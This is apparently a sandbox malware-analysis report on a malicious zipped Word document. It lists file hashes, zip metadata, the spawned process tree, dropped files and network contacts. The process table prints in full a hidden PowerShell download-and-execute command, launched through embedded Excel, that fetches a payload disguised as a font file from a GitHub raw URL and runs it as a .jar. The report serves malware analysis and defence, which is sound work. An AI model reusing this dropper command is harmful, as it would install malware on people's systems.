| Field | Value |
|---|---|
| File name | 07_06_19_14_29_34_gelenmail.zip |
| Full analysis | https://app.any.run/tasks/99c23602-6e30-4372-ae1a-5c5ba15a8df8 |
| Verdict | Malicious activity |
| Analysis date | July 18, 2019, 11:20:53 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | application/zip |
| File info | Zip archive data, at least v2.0 to extract |
| MD5 | 298DD5C982724C4BDAA4CE9523581A7C |
| SHA1 | EE47B1F8E4BA347BDF461954C68847E645311B60 |
| SHA256 | BA3D805C05B15BCE2F84A16A8C4D06B74C1CD2415B78B17FEB96602F2BD1DA03 |
| SSDEEP | 1536:mKVQi21V5bjfEK5m2me9Dkf+GTnvfr/xgOL+UooboUFXOLBA67S2goWCi:E1VB5Rf9DbGTvfrmG+Uo2oUMGG5i |
| Extension | Type |
|---|---|
| .zip | ZIP compressed archive (100) |

| Field | Value |
|---|---|
| ZipFileName | 08_07_2013_23-33_gelenmail.docx |
| ZipUncompressedSize | 101208 |
| ZipCompressedSize | 98055 |
| ZipCRC | 0x906fcd7a |
| ZipModifyDate | 2019:07:08 23:35:00 |
| ZipCompression | Unknown (99) |
| ZipBitFlag | 0x0009 |
| ZipRequiredVersion | 20 |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 2932 | `"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\07_06_19_14_29_34_gelenmail.zip"` | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Exit code: 0; Version: 5.60.0 |
| 4088 | `"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\08_07_2013_23-33_gelenmail.docx"` | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 2560 | `"C:\Windows\system32\verclsid.exe" /S /C {00020820-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5` | C:\Windows\system32\verclsid.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Extension CLSID Verification Host; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3200 | `"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding` | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Exit code: 0; Version: 14.0.6024.1000 |
| 3968 | `"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding` | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
| 3088 | `CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" %tmp%\\irs5WQ.jar\") }" & %tmp%\\irs5WQ.jar` | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3660 | `powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" C:\Users\admin\AppData\Local\Temp\\irs5WQ.jar\") }"` | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CMD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 4088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR12D7.tmp.cvr | — | — | — |
| 4088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DDE06C5C.png | — | — | — |
| 3200 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3860.tmp.cvr | — | — | — |
| 3968 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3D23.tmp.cvr | — | — | — |
| 3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q9C1N4MA6HJG6OWHUMUN.temp | — | — | — |
| 4088 | WINWORD.EXE | C:\Users\admin\Desktop\~$_07_2013_23-33_gelenmail.docx | pgc | B64D44E277E0AD26968D5A92C69C0C56 | 15AC686A2EC0EB641EE821F2E74C2FE949EBA94424E430B8C66815A84863A277 |
| 4088 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\08_07_2013_23-33_gelenmail.docx.LNK | lnk | A5D01BE235A34E802C67635EF67D4672 | D6B5241699479D308EA33897F281ECBF9BD8227E1D8B5A13F5BDC286A3527F2F |
| 4088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC92AA07.emf | emf | 3C840A930CF7E52977B4C0E08C7AEC74 | A8BCBBEEFD99A53EFC3579989E88E18A04CC537BD79E3775D21BDF7585B71C5C |
| 3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 47388A8B771AD359484FBDBC4C2AF508 | 710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 |
| 2932 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2932.39384\08_07_2013_23-33_gelenmail.docx | document | 6E64370C801AAF939EA59C64D2CEAA21 | 5D7BA29167BBF3E2B653A036FEA3A23F45518B1D2642175419749E60C8252602 |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3660 | powershell.exe | 151.101.0.133:443 | raw.githubusercontent.com | Fastly | US | malicious |

| Domain | IP | Reputation |
|---|---|---|
| raw.githubusercontent.com | — | shared |